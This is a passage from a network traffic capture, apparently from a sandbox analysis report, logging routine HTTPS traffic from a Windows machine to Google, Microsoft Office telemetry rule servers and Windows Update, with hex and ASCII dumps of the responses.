2024-12-08 12:31:27 UTC	933	IN	HTTP/1.1 200 OK Version: 702228742 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 08 Dec 2024 12:31:27 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-08 12:31:27 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-08 12:31:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.6	49767	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:27 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:27 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 229463e4-b01e-0021-2a03-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123127Z-r1cf579d778lntp7hC1EWR9gg400000004vg000000001ra3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:27 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.6	49768	20.234.120.54	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:27 UTC	602	OUT	GET /v1/a/impression?CID=128000000001615609&region=CH&lang=EN-CH%2CEN-GB&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.19041.1023&mo=&cap=&EID=&&PID=426081542&UIT=M-&TargetID=1&AN=311176752&PG=PC000P0FR5.0000000IRU&REQASID=0E7CE6B6AC244AB98054235EFE6BCC46&UNID=338389&ASID=34e77c2273584e07b7d7b447b5142ea0&&DS_EVTID=0E7CE6B6AC244AB98054235EFE6BCC46&DEVOSVER=10.0.19045.2006&REQT=20241208T123102&TIME=20241208T123109Z&ARCRAS=&CLR=CDM HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: ris.api.iris.microsoft.com Connection: Keep-Alive
2024-12-08 12:31:28 UTC	183	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 request-id: ac2b8cba-0aaa-4a2f-bb4e-ef29541ccfdb Date: Sun, 08 Dec 2024 12:31:27 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.6	49756	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:28 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:28 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: fff301c7-601e-0097-4606-48f33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123128Z-r1cf579d7788pwqzhC1EWRrpd800000005h0000000005v8r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:28 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.6	49769	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:28 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:28 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: c060231a-801e-00ac-2403-48fd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123128Z-r1cf579d7786c2tshC1EWRr1gc00000004w00000000067dk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:28 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.6	49770	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:28 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:28 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: f6d2a488-401e-000a-7403-484a7b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123128Z-r1cf579d778xr2r4hC1EWRqvfs00000005fg000000000tq0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:28 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.6	49771	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:28 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:28 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 987987f9-101e-0034-0e02-4896ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123128Z-r1cf579d77898tqwhC1EWRf9q800000005fg00000000135h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:28 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	49774	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:29 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=F6mZw79N1evM2Hy&MD=+abDNPzz HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-12-08 12:31:30 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 4970f065-6fb5-486f-b0cd-7eeac6ad6170 MS-RequestId: 2e5a6023-7a86-4e13-b61a-7a794edba35b MS-CV: QibKLQSh30Oc6gyW.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 08 Dec 2024 12:31:28 GMT Connection: close Content-Length: 24490
2024-12-08 12:31:30 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-12-08 12:31:30 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.6	49773	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:29 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:29 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: e9e1dff1-101e-0065-7303-484088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123129Z-r1cf579d778xq4f9hC1EWRx41g0000000590000000000qcd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:30 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.6	49775	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:30 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:30 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 7b99b195-101e-0017-7009-4847c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123130Z-r1cf579d778v97q7hC1EWRf95c0000000500000000002q7x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:30 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.6	49779	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:30 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:30 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 90a12f2a-001e-0079-1603-4812e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123130Z-r1cf579d778qgtz2hC1EWRmgks000000052g000000006b43 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:30 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.6	49781	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:30 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:31 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:30 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 09188c3a-a01e-0021-2702-48814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123130Z-r1cf579d778d5zkmhC1EWRk6h800000005s0000000004szt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:31 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.6	49782	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:30 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
